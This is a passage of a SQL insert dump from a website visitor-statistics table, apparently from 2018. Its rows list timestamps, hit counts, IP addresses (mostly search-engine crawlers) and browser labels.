302189,1536754092,4,4,0,0,'66.249.66.75','chrome'),(302190,1536754412,2,2,0,0,'178.154.244.29','other'),(302191,1536754465,1,1,0,0,'77.93.44.22','chrome'),(302192,1536754536,2,2,0,0,'66.249.66.74','chrome'),(302193,1536754591,1,1,0,0,'178.154.244.11','other'),(302194,1536754630,1,1,0,0,'40.77.167.215','other'),(302195,1536754684,4,4,0,0,'66.249.66.73','chrome'),(302196,1536754869,1,1,0,0,'37.53.184.239','chrome'),(302197,1536755516,1,1,0,0,'66.249.66.75','chrome'),(302198,1536755975,2,2,0,0,'66.249.66.74','chrome'),(302199,1536756081,1,1,0,0,'78.137.4.82','chrome'),(302200,1536756101,1,1,0,0,'178.154.244.11','other'),(302201,1536756310,1,1,0,0,'178.154.244.29','other'),(302202,1536757040,1,1,0,0,'78.154.167.14','chrome'),(302203,1536757070,1,1,0,0,'95.134.220.101','chrome'),(302204,1536757181,1,1,0,0,'8.29.198.27','other'),(302205,1536757199,1,1,0,0,'8.29.198.25','other'),(302206,1536757202,1,1,0,0,'66.249.66.74','chrome'),(302207,1536757487,1,1,0,0,'95.132.49.204','firefox'),(302208,1536757622,1,1,0,0,'31.43.18.196','chrome'),(302209,1536757931,2,2,0,0,'66.249.66.75','chrome'),(302210,1536758247,1,1,0,0,'66.249.66.27','chrome'),(302211,1536758261,1,1,0,0,'193.19.187.192','chrome'),(302212,1536758629,2,2,0,0,'66.249.66.74','chrome'),(302213,1536758776,4,4,0,0,'66.249.66.73','chrome'),(302214,1536759480,3,3,0,0,'66.249.66.75','chrome'),(302215,1536760195,2,2,0,0,'66.249.66.73','chrome'),(302216,1536760303,1,1,0,0,'194.63.141.238','chrome'),(302217,1536760480,3,3,0,0,'66.249.66.75','chrome'),(302218,1536760615,2,2,0,0,'66.249.66.74','chrome'),(302219,1536760851,2,2,0,0,'62.205.134.182','msie'),(302220,1536761183,2,1,1,0,'66.249.66.73',''),(302221,1536761456,1,1,0,0,'8.29.198.26','other'),(302222,1536761468,2,2,0,0,'91.209.11.236','other'),(302223,1536761491,3,3,0,0,'66.249.66.73','chrome'),(302224,1536761933,2,2,0,0,'66.249.66.74','chrome'),(302225,1536762359,2,2,0,0,'66.249.66.75','chrome'),(302226,1536762707,1,1,0,0,'66.249.66.156','chrome'),(302227,1536762874,2,2,0,0,'66.249.66.74','chrome'),(302228,1536763468,3,3,0,0,'66.249.66.75','chrome'),(302229,1536763803,1,1,0,0,'66.249.66.73','chrome'),(302230,1536763960,5,5,0,0,'66.249.66.74','chrome'),(302231,1536764185,1,1,0,0,'89.102.51.3','chrome'),(302232,1536764539,2,2,0,0,'178.154.244.29','other'),(302233,1536764812,1,1,0,0,'37.55.184.64','chrome'),(302234,1536764891,1,1,0,0,'178.154.244.11','other'),(302235,1536764978,3,3,0,0,'66.249.66.74','chrome'),(302236,1536765126,2,2,0,0,'66.249.66.75','chrome'),(302237,1536765437,2,2,0,0,'66.249.66.73','chrome'),(302238,1536766031,2,2,0,0,'66.249.66.75','chrome'),(302239,1536766176,3,3,0,0,'66.249.66.74','chrome'),(302240,1536766482,3,3,0,0,'66.249.66.73','chrome'),(302241,1536766529,1,1,0,0,'207.46.13.4','other'),(302242,1536767055,1,1,0,0,'178.154.244.11','other'),(302243,1536767100,1,1,0,0,'188.230.43.254','other'),(302244,1536768016,2,2,0,0,'8.29.198.26','other'),(302245,1536768466,1,1,0,0,'91.196.178.178','chrome'),(302246,1536768789,1,1,0,0,'216.244.66.241','other'),(302247,1536768908,1,1,0,0,'66.249.66.27','chrome'),(302248,1536769497,1,1,0,0,'188.230.43.254','other'),(302249,1536769761,1,1,0,0,'178.154.244.11','other'),(302250,1536769787,1,1,0,0,'66.249.66.73','chrome'),(302251,1536770064,1,1,0,0,'91.196.178.91','firefox'),(302252,1536770291,1,1,0,0,'66.249.66.74','chrome'),(302253,1536770458,1,1,0,0,'66.249.66.27','chrome'),(302254,1536770539,1,0,1,0,'66.249.66.75',''),(302255,1536770876,2,2,0,0,'157.55.39.174','other'),(302256,1536772208,1,1,0,0,'188.230.43.254','other'),(302257,1536772280,1,1,0,0,'8.29.198.27','other'),(302258,1536772467,2,2,0,0,'5.45.207.79','other'),(302259,1536772887,2,2,0,0,'91.209.11.236','other'),(302260,1536772946,1,1,0,0,'178.154.244.29','other'),(302261,1536773355,1,1,0,0,'40.77.167.215','other'),(302262,1536773709,1,1,0,0,'216.244.66.241','other'),(302263,1536773832,1,1,0,0,'91.209.11.236','other'),(302264,1536774372,1,1,0,0,'178.154.244.11','other'),(302265,1536775159,1,1,0,0,'91.196.178.79','firefox'),(302266,1536775665,1,0,1,0,'66.249.66.75',''),(302267,1536775737,2,2,0,0,'66.249.66.75','chrome'),(302268,1536775878,1,1,0,0,'40.77.167.215','other'),(302269,1536776068,1,1,0,0,'66.249.66.27','chrome'),(302270,1536776164,1,0,1,0,'66.249.66.73',''),(302271,1536776306,3,3,0,0,'178.154.244.29','other'),(302272,1536776957,1,1,0,0,'141.8.142.108','other'),(302273,1536776960,1,1,0,0,'178.154.244.11','other'),(302274,1536777172,1,1,0,0,'95.108.213.4','other'),(302275,1536777514,1,1,0,0,'178.154.244.29','other'),(302276,1536778852,2,2,0,0,'8.29.198.26','other'),(302277,1536779688,1,1,0,0,'130.180.208.115','chrome'),(302278,1536779728,1,0,1,0,'66.249.66.74',''),(302279,1536782806,1,1,0,0,'91.196.178.133','firefox'),(302280,1536783112,1,1,0,0,'8.29.198.27','other'),(302281,1536783428,1,1,0,0,'66.249.66.74','chrome'),(302282,1536784517,1,1,0,0,'66.249.66.75','chrome'),(302283,1536784758,1,0,1,0,'66.249.66.25',''),(302284,1536784994,2,2,0,0,'91.196.177.69','chrome'),(302285,1536785066,1,1,0,0,'66.249.66.26','chrome'),(302286,1536785260,1,1,0,0,'66.249.66.74','chrome'),(302287,1536785451,1,1,0,0,'66.249.66.75','chrome'),(302288,1536785907,2,2,0,0,'216.244.66.241','other'),(302289,1536786869,1,1,0,0,'216.244.66.241','other'),(302290,1536787221,1,1,0,0,'188.32.161.219','msie'),(302291,1536787424,1,1,0,0,'66.249.66.74','chrome'),(302292,1536787909,1,1,0,0,'66.249.66.75','chrome'),(302293,1536788015,1,1,0,0,'91.209.11.236','other'),(302294,1536788577,1,0,1,0,'66.249.66.73',''),(302295,1536789680,2,2,0,0,'8.29.198.25','other'),(302296,1536791231,2,2,0,0,'178.154.244.29','other'),(302297,1536791393,1,1,0,0,'178.154.244.11','other'),(302298,1536792010,1,1,0,0,'37.9.113.148','other'),(302299,1536792340,1,1,0,0,'178.154.244.29','other'),(302300,1536793344,1,1,0,0,'66.249.66.156','chrome'),(302301,1536793946,1,1,0,0,'8.29.198.26','other'),(302302,1536795167,5,5,0,0,'54.165.59.7','other'),(302303,1536795622,1,1,0,0,'66.249.66.59','chrome'),(302304,1536796202,1,1,0,0,'216.244.66.241','other'),(302305,1536796604,1,1,0,0,'54.165.59.7','other'),(302306,1536797005,1,0,1,0,'66.249.66.156',''),(302307,1536797155,2,2,0,0,'66.249.66.157','chrome'),(302308,1536799555,1,1,0,0,'207.46.13.4','other'),(302309,1536799760,1,1,0,0,'66.249.66.155','chrome'),(302310,1536799764,1,0,1,0,'66.249.66.156',''),(302311,1536799866,1,1,0,0,'193.106.30.98','firefox'),(302312,1536800510,1,1,0,0,'8.29.198.27','other'),(302313,1536800511,1,1,0,0,'8.29.198.25','other'),(302314,1536801229,2,2,0,0,'40.77.167.215','other'),(302315,1536801452,1,1,0,0,'178.154.244.29','other'),(302316,1536801697,1,1,0,0,'216.244.66.241','other'),(302317,1536801764,1,1,0,0,'91.209.11.236','other'),(302318,1536801952,1,1,0,0,'66.249.66.156','chrome'),(302319,1536802388,1,1,0,0,'66.249.66.157','chrome'),(302320,1536803553,1,1,0,0,'35.162.141.144','chrome'),(302321,1536804302,1,1,0,0,'216.244.66.241','other'),(302322,1536804400,1,1,0,0,'66.249.66.156','chrome'),(302323,1536804778,1,1,0,0,'8.29.198.27','other'),(302324,1536804841,1,1,0,0,'66.249.66.61','chrome'),(302325,1536806766,4,4,0,0,'178.154.244.29','other'),(302326,1536806824,1,1,0,0,'178.154.244.65','other'),(302327,1536806843,1,1,0,0,'52.34.24.33','chrome'),(302328,1536807072,1,1,0,0,'5.45.207.19','other'),(302329,1536807262,1,0,1,0,'66.249.66.155',''),(302330,1536807570,1,1,0,0,'95.163.255.98','other'),(302331,1536808156,1,1,0,0,'66.249.66.156','chrome'),(302332,1536808203,1,1,0,0,'94.45.190.36','chrome'),(302333,1536809284,1,1,0,0,'66.249.66.157','chrome'),(302334,1536809803,1,1,0,0,'66.249.66.155','chrome'),(302335,1536810340,1,1,0,0,'207.46.13.4','other'),(302336,1536811031,1,1,0,0,'40.77.167.215','other'),(302337,1536811335,1,1,0,0,'8.29.198.27','other'),(302338,1536811338,1,1,0,0,'8.29.198.25','other'),(302339,1536812292,1,1,0,0,'66.249.66.156','chrome'),(302340,1536812344,1,1,0,0,'66.249.66.61','chrome'),(302341,1536812368,1,1,0,0,'216.244.66.241','other'),(302342,1536814395,2,2,0,0,'91.196.177.46','chrome'),(302343,1536815199,1,1,0,0,'157.55.39.174','other'),(302344,1536815569,1,0,1,0,'66.249.66.156',''),(302345,1536815603,1,1,0,0,'8.29.198.26','other'),(302346,1536815695,1,1,0,0,'178.154.244.29','other'),(302347,1536815699,1,1,0,0,'178.154.244.11','other'),(302348,1536816651,1,0,1,0,'66.249.66.157',''),(302349,1536818346,1,1,0,0,'78.154.167.14','chrome'),(302350,1536818731,1,1,0,0,'91.196.178.172','chrome'),(302351,1536819155,1,1,0,0,'91.196.178.94','chrome'),(302352,1536819322,1,1,0,0,'193.106.30.98','firefox'),(302353,1536820014,1,1,0,0,'91.196.178.94','firefox'),(302354,1536820224,1,1,0,0,'66.249.66.156','chrome'),(302355,1536821171,1,1,0,0,'31.128.251.155','chrome'),(302356,1536822164,1,1,0,0,'8.29.198.26','other'),(302357,1536822166,1,1,0,0,'8.29.198.25','other'),(302358,1536822610,1,1,0,0,'157.55.39.174','other'),(302359,1536822778,1,0,1,0,'66.249.66.155',''),(302360,1536822924,1,1,0,0,'91.196.178.131','firefox'),(302361,1536823659,1,1,0,0,'216.244.66.241','other'),(302362,1536824274,1,1,0,0,'66.249.66.156','chrome'),(302363,1536824589,7,7,0,0,'178.154.244.29','other'),(302364,1536824687,1,1,0,0,'66.249.66.61','chrome'),(302365,1536825526,1,1,0,0,'207.46.13.4','other'),(302366,1536825527,4,4,0,0,'178.154.244.29','other'),(302367,1536825858,1,1,0,0,'178.154.244.11','other'),(302368,1536826218,1,1,0,0,'66.249.66.155','chrome'),(302369,1536826426,1,1,0,0,'8.29.198.26','other'),(302370,1536826469,1,1,0,0,'178.154.244.29','other'),(302371,1536827135,1,1,0,0,'195.34.204.152','chrome'),(302372,1536827502,1,1,0,0,'216.244.66.241','other'),(302373,1536827617,1,1,0,0,'37.115.220.9','firefox'),(302374,1536828262,1,0,1,0,'66.249.66.156',''),(302375,1536829669,1,1,0,0,'91.196.178.93','firefox'),(302376,1536830206,1,0,1,0,'66.249.66.61',''),(302377,1536830379,1,1,0,0,'194.187.219.50','chrome'),(302378,1536830441,1,1,0,0,'157.55.39.40','other'),(302379,1536830456,1,1,0,0,'91.196.177.205','chrome'),(302380,1536831777,1,1,0,0,'157.55.39.40','other'),(302381,1536832106,1,1,0,0,'66.249.66.156','chrome'),(302382,1536832247,1,1,0,0,'66.249.66.57','chrome'),(302383,1536832344,1,1,0,0,'91.196.177.46','firefox'),(302384,1536832549,1,1,0,0,'216.244.66.241','other'),(302385,1536832998,2,2,0,0,'8.29.198.27','other'),(302386,1536833095,1,1,0,0,'130.180.220.215','chrome'),(302387,1536833203,1,1,0,0,'207.46.13.4','other'),(302388,1536833737,1,1,0,0,'95.163.255.93','other'),(302389,1536833766,1,1,0,0,'66.249.66.155','chrome'),(302390,1536835512,1,1,0,0,'157.55.39.40','other'),(302391,1536835578,1,0,1,0,'66.249.66.156',''),(302392,1536836332,1,1,0,0,'95.163.255.102','other'),(302393,1536836335,1,1,0,0,'95.163.255.104','other'),(302394,1536836339,1,1,0,0,'95.163.255.114','other'),(302395,1536836769,1,1,0,0,'157.55.39.174','other'),(302396,1536837011,1,1,0,0,'62.205.134.182','msie'),(302397,1536837249,1,1,0,0,'8.29.198.25','other'),(302398,1536837271,1,1,0,0,'216.244.66.241','other'),(302399,1536837319,1,1,0,0,'54.165.59.7','other'),(302400,1536838360,1,1,0,0,'66.249.66.157','chrome'),(302401,1536838496,1,1,0,0,'66.249.66.155','chrome'),(302402,1536838637,1,1,0,0,'193.19.119.39','firefox'),(302403,1536839074,1,1,0,0,'66.249.66.57','chrome'),(302404,1536839434,1,1,0,0,'216.244.66.241','other'),(302405,1536839591,1,1,0,0,'62.205.134.182','msie'),(302406,1536840119,1,1,0,0,'207.46.13.4','other'),(302407,1536840178,1,1,0,0,'5.83.23.3','chrome'),(302408,1536840497,1,1,0,0,'157.55.39.174','other'),(302409,1536840592,1,1,0,0,'141.8.142.103','other'),(302410,1536840720,1,1,0,0,'178.154.244.11','other'),(302411,1536840822,4,4,0,0,'178.154.244.29','other'),(302412,1536841241,2,2,0,0,'5.45.207.79','other'),(302413,1536841305,1,1,0,0,'5.45.207.19','other'),(302414,1536841316,1,1,0,0,'95.163.255.108','other'),(302415,1536841492,1,1,0,0,'130.180.220.215','chrome'),(302416,1536841753,1,1,0,0,'178.154.244.29','other'),(302417,1536841759,3,3,0,0,'178.154.244.11','other'),(302418,1536842556,2,2,0,0,'91.196.178.104','chrome'),(302419,1536842573,1,1,0,0,'142.93.83.83','firefox'),(302420,1536842931,1,1,0,0,'216.244.66.241','other'),(302421,1536843023,1,0,1,0,'66.249.66.157',''),(302422,1536843837,1,1,0,0,'8.29.198.26','other'),(302423,1536843838,1,1,0,0,'8.29.198.25','other'),(302424,1536845166,1,0,1,0,'66.249.66.61',''),(302425,1536845323,1,1,0,0,'188.230.43.254','other'),(302426,1536846763,1,1,0,0,'80.252.154.233','chrome'),(302427,1536846920,1,1,0,0,'91.196.178.92','chrome'),(302428,1536847165,1,1,0,0,'95.132.43.176','firefox'),(302429,1536847243,1,1,0,0,'216.244.66.241','other'),(302430,1536847346,2,2,0,0,'66.249.66.155','chrome'),(302431,1536847750,1,1,0,0,'188.230.43.254','other'),(302432,1536847872,1,1,0,0,'66.249.66.59','chrome'),(302433,1536847989,1,1,0,0,'193.106.30.98','firefox'),(302434,1536848074,1,1,0,0,'8.29.198.27','other'),(302435,1536848737,1,1,0,0,'162.210.196.98','other'),(302436,1536848905,1,1,0,0,'91.209.11.236','other'),(302437,1536849007,1,1,0,0,'91.196.178.189','chrome'),(302438,1536850116,1,1,0,0,'188.230.43.254','other'),(302439,1536850383,1,1,0,0,'178.154.244.11','other'),(302440,1536850387,1,1,0,0,'216.244.66.241','other'),(302441,1536850388,1,1,0,0,'5.45.207.19','other'),(302442,1536851395,1,1,0,0,'157.55.39.174','other'),(302443,1536852181,1,1,0,0,'91.196.177.205','chrome'),(302444,1536852554,1,1,0,0,'188.230.43.254','other'),(302445,1536852612,1,1,0,0,'216.244.66.241','other'),(302446,1536853207,1,1,0,0,'178.154.244.11','other'),(302447,1536853316,1,1,0,0,'157.55.39.40','other'),(302448,1536853350,3,3,0,0,'178.154.244.29','other'),(302449,1536853373,1,1,0,0,'213.191.133.2','firefox'),(302450,1536853549,1,1,0,0,'40.77.167.134','other'),(302451,1536854002,1,1,0,0,'62.205.134.182','msie'),(302452,1536854665,1,1,0,0,'8.29.198.26','other'),(302453,1536854669,1,1,0,0,'8.29.198.27','other'),(302454,1536855055,2,2,0,0,'216.244.66.241','other'),(302455,1536855444,1,1,0,0,'188.230.43.254','other'),(302456,1536856455,1,1,0,0,'176.193.124.233','msie'),(302457,1536856855,1,1,0,0,'216.244.66.241','other'),(302458,1536857844,1,1,0,0,'188.230.43.254','other'),(302459,1536858849,1,1,0,0,'54.165.59.7','other'),(302460,1536858902,1,1,0,0,'8.29.198.27','other'),(302461,1536860229,1,1,0,0,'157.55.39.174','other'),(302462,1536860427,1,1,0,0,'77.111.244.37','chrome'),(302463,1536861652,1,1,0,0,'157.55.39.174','other'),(302464,1536861977,1,1,0,0,'91.196.178.70','firefox'),(302465,1536864242,2,2,0,0,'91.209.11.236','other'),(302466,1536865496,2,2,0,0,'8.29.198.26','other'),(302467,1536866242,17,17,0,0,'157.55.39.40','other'),(302468,1536866256,8,8,0,0,'207.46.13.4','other'),(302469,1536866264,16,16,0,0,'157.55.39.174','other'),(302470,1536866280,7,7,0,0,'40.77.167.134','other'),(302471,1536866560,1,1,0,0,'91.196.178.74','chrome'),(302472,1536866945,1,1,0,0,'54.165.59.7','other'),(302473,1536867131,2,2,0,0,'178.154.244.29','other'),(302474,1536867641,1,1,0,0,'193.106.30.98','firefox'),(302475,1536867837,1,1,0,0,'216.244.66.241','other'),(302476,1536868573,1,1,0,0,'180.76.15.139','other'),(302477,1536868937,1,1,0,0,'178.154.244.11','other'),(302478,1536869448,6,6,0,0,'178.154.244.29','other'),(302479,1536869731,1,1,0,0,'8.29.198.26','other'),(302480,1536870028,2,2,0,0,'157.55.39.40','other'),(302481,1536870503,1,1,0,0,'178.154.244.11','other'),(302482,1536870505,2,2,0,0,'178.154.244.29','other'),(302483,1536871968,1,1,0,0,'213.179.252.5','chrome'),(302484,1536873023,1,1,0,0,'216.244.66.241','other'),(302485,1536873172,1,1,0,0,'207.46.13.4','other'),(302486,1536876331,2,2,0,0,'8.29.198.26','other'),(302487,1536876676,1,1,0,0,'40.77.167.134','other'),(302488,1536877115,1,1,0,0,'180.76.15.136','other'),(302489,1536878237,1,1,0,0,'40.77.167.134','other'),(302490,1536878570,1,1,0,0,'66.249.66.57','chrome'),(302491,1536880568,1,1,0,0,'8.29.198.25','other'),(302492,1536880703,1,1,0,0,'176.193.115.63','msie'),(302493,1536881828,1,1,0,0,'54.165.59.7','other'),(302494,1536882378,3,3,0,0,'91.209.11.236','other'),(302495,1536882981,1,1,0,0,'180.76.15.28','other'),(302496,1536883008,1,1,0,0,'207.46.13.4','other'),(302497,1536883997,1,1,0,0,'54.165.59.7','other'),(302498,1536885173,3,3,0,0,'54.165.59.7','other'),(302499,1536885250,1,1,0,0,'66.249.66.157','chrome'),(302500,1536885430,1,0,1,0,'66.249.66.155',''),(302501,1536885446,1,1,0,0,'216.244.66.241','other'),(302502,1536885610,1,1,0,0,'66.249.66.155','chrome'),(302503,1536885896,1,1,0,0,'66.249.66.61','chrome'),(302504,1536886105,1,1,0,0,'54.165.59.7','other'),(302505,1536887184,2,2,0,0,'8.29.198.25','other'),(302506,1536887294,64,64,0,0,'66.249.66.155','chrome'),(302507,1536887495,2,2,0,0,'66.249.66.157','chrome'),(302508,1536887537,2,2,0,0,'66.249.66.156','chrome'),(302509,1536887818,2,2,0,0,'54.165.59.7','other'),(302510,1536887905,1,1,0,0,'178.154.244.11','other'),(302511,1536888133,1,1,0,0,'216.244.66.241','other'),(302512,1536888694,1,1,0,0,'35.162.214.175','chrome'),(302513,1536889521,2,2,0,0,'178.154.244.29','other'),(302514,1536889624,1,1,0,0,'178.154.244.11','other'),(302515,1536889695,1,1,0,0,'62.205.134.182','msie'),(302516,1536890003,2,2,0,0,'216.244.66.241','other'),(302517,1536890031,1,1,0,0,'5.188.210.52','firefox'),(302518,1536890689,1,1,0,0,'178.154.244.29','other'),(302519,1536890746,1,0,1,0,'66.249.66.156',''),(302520,1536890824,1,1,0,0,'178.154.244.11','other'),(302521,1536891237,1,1,0,0,'52.41.211.72','chrome'),(302522,1536891391,1,1,0,0,'8.29.198.26','other'),(302523,1536893060,1,1,0,0,'141.8.142.108','other'),(302524,1536894274,7,7,0,0,'157.55.39.40','other'),(302525,1536894285,12,12,0,0,'157.55.39.174','other'),(302526,1536894298,6,6,0,0,'207.46.13.4','other'),(302527,1536894308,6,6,0,0,'40.77.167.134','other'),(302528,1536894565,1,1,0,0,'66.249.66.57','chrome'),(302529,1536896017,1,1,0,0,'216.244.66.241','other'),(302530,1536896076,1,1,0,0,'66.249.66.156','chrome'),(302531,1536896128,1,1,0,0,'95.163.255.98','other'),(302532,1536896927,1,1,0,0,'94.45.190.36','chrome'),(302533,1536898009,1,1,0,0,'8.29.198.27','other'),(302534,1536898035,1,1,0,0,'8.29.198.26','other'),(302535,1536898119,1,1,0,0,'157.55.39.174','other'),(302536,1536898406,1,1,0,0,'66.249.66.155','chrome'),(302537,1536898663,1,0,1,0,'66.249.66.156',''),(302538,1536899607,1,1,0,0,'52.53.201.78','chrome'),(302539,1536900271,1,1,0,0,'66.249.66.57','chrome'),(302540,1536900374,2,2,0,0,'46.211.113.27','chrome'),(302541,1536901319,1,1,0,0,'141.8.142.108','other'),(302542,1536901320,1,1,0,0,'95.108.181.54','other'),(302543,1536901818,1,1,0,0,'91.196.178.74','chrome'),(302544,1536902232,1,1,0,0,'8.29.198.27','other'),(302545,1536902439,1,1,0,0,'66.249.66.155','chrome'),(302546,1536903000,1,1,0,0,'173.208.206.50','other'),(302547,1536903731,1,1,0,0,'91.196.178.94','chrome'),(302548,1536904894,1,1,0,0,'91.196.177.46','chrome'),(302549,1536905319,1,0,1,0,'66.249.66.155',''),(302550,1536905634,1,1,0,0,'66.249.66.157','chrome'),(302551,1536905773,1,1,0,0,'195.230.119.59','chrome'),(302552,1536905896,1,1,0,0,'91.196.178.170','chrome'),(302553,1536905908,1,1,0,0,'66.249.66.59','chrome'),(302554,1536906073,1,1,0,0,'37.115.220.9','firefox'),(302555,1536906098,1,1,0,0,'157.55.39.174','other'),(302556,1536906143,1,1,0,0,'5.45.207.79','other'),(302557,1536906944,1,1,0,0,'91.196.178.94','chrome'),(302558,1536907419,1,1,0,0,'176.113.209.232','chrome'),(302559,1536908742,1,1,0,0,'66.249.66.155','chrome'),(302560,1536908832,2,2,0,0,'8.29.198.26','other'),(302561,1536908985,1,1,0,0,'66.249.66.157','chrome'),(302562,1536909364,1,1,0,0,'130.180.218.75','chrome'),(302563,1536909627,1,1,0,0,'13.66.139.0','other'),(302564,1536910145,3,3,0,0,'178.154.244.29','other'),(302565,1536910245,1,1,0,0,'178.95.67.148','chrome'),(302566,1536910275,1,1,0,0,'178.154.244.11','other'),(302567,1536910878,1,1,0,0,'37.9.113.103','other'),(302568,1536911129,2,2,0,0,'216.244.66.241','other'),(302569,1536911236,1,1,0,0,'146.185.157.38','chrome'),(302570,1536911294,1,1,0,0,'91.196.178.94','chrome'),(302571,1536911442,1,1,0,0,'209.90.225.228','chrome'),(302572,1536912541,2,1,1,0,'66.249.66.157',''),(302573,1536912574,2,2,0,0,'91.196.177.15','chrome'),(302574,1536913066,1,1,0,0,'8.29.198.25','other'),(302575,1536913103,1,1,0,0,'66.249.66.57','chrome'),(302576,1536913472,1,1,0,0,'91.196.178.131','firefox'),(302577,1536913511,1,1,0,0,'162.210.196.129','other'),(302578,1536914237,1,1,0,0,'216.244.66.241','other'),(302579,1536914689,1,1,0,0,'195.20.125.6','chrome'),(302580,1536916215,1,1,0,0,'94.45.190.36','firefox'),(302581,1536916413,1,1,0,0,'91.196.178.94','chrome'),(302582,1536916475,1,1,0,0,'40.77.167.134','other'),(302583,1536916544,1,1,0,0,'91.196.178.171','chrome'),(302584,1536916632,1,1,0,0,'194.183.183.82','chrome'),(302585,1536916650,1,1,0,0,'80.252.153.33','chrome'),(302586,1536917004,1,1,0,0,'216.244.66.241','other'),(302587,1536918785,1,1,0,0,'157.55.39.40','other'),(302588,1536919113,1,1,0,0,'5.45.207.79','other'),(302589,1536919152,1,1,0,0,'37.9.113.148','other'),(302590,1536919658,1,1,0,0,'8.29.198.25','other'),(302591,1536919696,1,1,0,0,'8.29.198.27','other'),(302592,1536920046,1,1,0,0,'66.249.66.61','chrome'),(302593,1536920100,1,0,1,0,'66.249.66.155',''),(302594,1536920123,1,1,0,0,'92.113.55.80','chrome'),(302595,1536920134,1,1,0,0,'157.55.39.40','other'),(302596,1536921454,1,1,0,0,'91.196.178.71','firefox'),(302597,1536921638,1,1,0,0,'66.249.66.156','chrome'),(302598,1536921792,1,1,0,0,'66.249.66.157','chrome'),(302599,1536921900,1,1,0,0,'216.244.66.241','other'),(302600,1536922044,10,10,0,0,'23.91.70.45','other'),(302601,1536922061,2,2,0,0,'23.91.70.45','opera'),(302602,1536922155,1,1,0,0,'91.124.14.90','chrome'),(302603,1536923647,1,1,0,0,'95.163.255.118','other'),(302604,1536923651,1,1,0,0,'95.163.255.115','other'),(302605,1536923903,1,1,0,0,'8.29.198.26','other'),(302606,1536924757,1,1,0,0,'46.211.134.196','chrome'),(302607,1536925038,1,0,1,0,'66.249.66.155',''),(302608,1536925536,13,13,0,0,'157.55.39.174','other'),(302609,1536925541,1,1,0,0,'95.163.255.103','other'),(302610,1536925548,7,7,0,0,'40.77.167.134','other'),(302611,1536925562,7,7,0,0,'157.55.39.40','other'),(302612,1536925574,12,12,0,0,'207.46.13.4','other'),(302613,1536927131,1,1,0,0,'66.249.66.157','chrome'),(302614,1536927206,1,1,0,0,'66.249.66.59','chrome'),(302615,1536927463,1,1,0,0,'91.196.178.94','chrome'),(302616,1536928287,1,1,0,0,'5.45.207.79','other'),(302617,1536928300,2,2,0,0,'178.154.244.29','other'),(302618,1536928629,1,1,0,0,'178.154.244.11','other'),(302619,1536928893,1,1,0,0,'82.207.49.106','chrome'),(302620,1536929047,1,1,0,0,'66.249.66.157','chrome'),(302621,1536929054,1,1,0,0,'66.249.66.156','chrome'),(302622,1536929667,1,1,0,0,'66.102.9.136','chrome'),(302623,1536929714,1,1,0,0,'91.196.177.85','chrome'),(302624,1536930487,1,1,0,0,'8.29.198.27','other'),(302625,1536930529,1,1,0,0,'8.29.198.25','other'),(302626,1536930979,1,1,0,0,'141.8.142.103','other'),(302627,1536931362,1,1,0,0,'5.45.207.8','other'),(302628,1536931445,6,6,0,0,'178.154.244.11','other'),(302629,1536931504,7,7,0,0,'178.154.244.29','other'),(302630,1536931629,3,3,0,0,'216.244.66.241','other'),(302631,1536931687,2,2,0,0,'54.208.102.37','other'),(302632,1536931688,2,2,0,0,'107.21.1.8','other'),(302633,1536931813,1,1,0,0,'134.249.146.125','chrome'),(302634,1536932218,1,1,0,0,'66.249.66.59','chrome'),(302635,1536932408,1,1,0,0,'178.154.244.11','other'),(302636,1536932489,5,5,0,0,'178.154.244.29','other'),(302637,1536932526,1,1,0,0,'37.55.225.27','chrome'),(302638,1536933540,1,1,0,0,'37.9.113.103','other'),(302639,1536933971,1,1,0,0,'66.249.66.61','chrome'),(302640,1536934285,1,1,0,0,'35.160.202.6','firefox'),(302641,1536934739,1,1,0,0,'8.29.198.26','other'),(302642,1536938035,1,1,0,0,'178.133.13.131','chrome'),(302643,1536938140,1,1,0,0,'66.249.66.59','chrome'),(302644,1536938805,1,1,0,0,'62.205.134.182','msie'),(302645,1536939326,1,1,0,0,'178.154.244.29','other'),(302646,1536939330,1,1,0,0,'5.45.207.19','other'),(302647,1536939855,1,1,0,0,'40.77.167.134','other'),(302648,1536941275,1,1,0,0,'91.196.178.84','firefox'),(302649,1536941316,1,1,0,0,'8.29.198.27','other'),(302650,1536941363,1,1,0,0,'8.29.198.26','other'),(302651,1536941713,1,1,0,0,'87.250.224.65','other'),(302652,1536942998,1,1,0,0,'40.77.167.134','other'),(302653,1536943446,1,0,1,0,'66.249.66.157',''),(302654,1536943620,1,1,0,0,'66.249.66.155','chrome'),(302655,1536943680,1,1,0,0,'66.249.66.156','chrome'),(302656,1536945255,1,1,0,0,'91.196.178.71','firefox'),(302657,1536945507,1,1,0,0,'66.249.65.121','chrome'),(302658,1536945565,1,1,0,0,'8.29.198.25','other'),(302659,1536946189,1,1,0,0,'157.55.39.174','other'),(302660,1536946475,1,1,0,0,'54.198.205.153','other'),(302661,1536946969,1,1,0,0,'91.196.178.133','firefox'),(302662,1536947992,1,1,0,0,'216.244.66.241','other'),(302663,1536949854,1,0,1,0,'66.249.65.103',''),(302664,1536950061,1,1,0,0,'66.249.65.105','chrome'),(302665,1536950352,1,1,0,0,'216.244.66.241','other'),(302666,1536950924,1,1,0,0,'66.249.65.125','chrome'),(302667,1536951127,5,5,0,0,'178.154.244.29','other'),(302668,1536951198,2,2,0,0,'5.45.207.79','other'),(302669,1536951814,2,2,0,0,'91.196.178.44','chrome'),(302670,1536952008,2,0,2,0,'66.249.65.105',''),(302671,1536952154,2,2,0,0,'8.29.198.25','other'),(302672,1536952242,1,1,0,0,'66.249.65.103','chrome'),(302673,1536952414,1,1,0,0,'157.55.39.174','other'),(302674,1536953024,1,1,0,0,'180.76.15.14','other'),(302675,1536953145,1,1,0,0,'180.76.15.150','other'),(302676,1536953283,1,1,0,0,'178.154.244.11','other'),(302677,1536953391,1,1,0,0,'178.154.244.29','other'),(302678,1536956394,1,1,0,0,'8.29.198.25','other'),(302679,1536956496,1,1,0,0,'157.55.39.174','other'),(302680,1536956963,1,1,0,0,'66.249.65.99','chrome'),(302681,1536957901,1,1,0,0,'66.249.65.123','chrome'),(302682,1536958429,1,1,0,0,'180.76.15.146','other'),(302683,1536958688,1,1,0,0,'54.160.69.129','chrome'),(302684,1536959319,1,1,0,0,'66.249.65.105','chrome'),(302685,1536959331,1,1,0,0,'40.77.167.19','other'),(302686,1536959487,1,0,1,0,'66.249.65.99',''),(302687,1536962139,1,1,0,0,'157.55.39.174','other'),(302688,1536962979,1,1,0,0,'8.29.198.25','other'),(302689,1536963029,1,1,0,0,'8.29.198.27','other'),(302690,1536965631,1,1,0,0,'91.209.11.236','other'),(302691,1536965765,1,1,0,0,'66.249.65.99','chrome'),(302692,1536965891,1,1,0,0,'66.249.65.121','chrome'),(30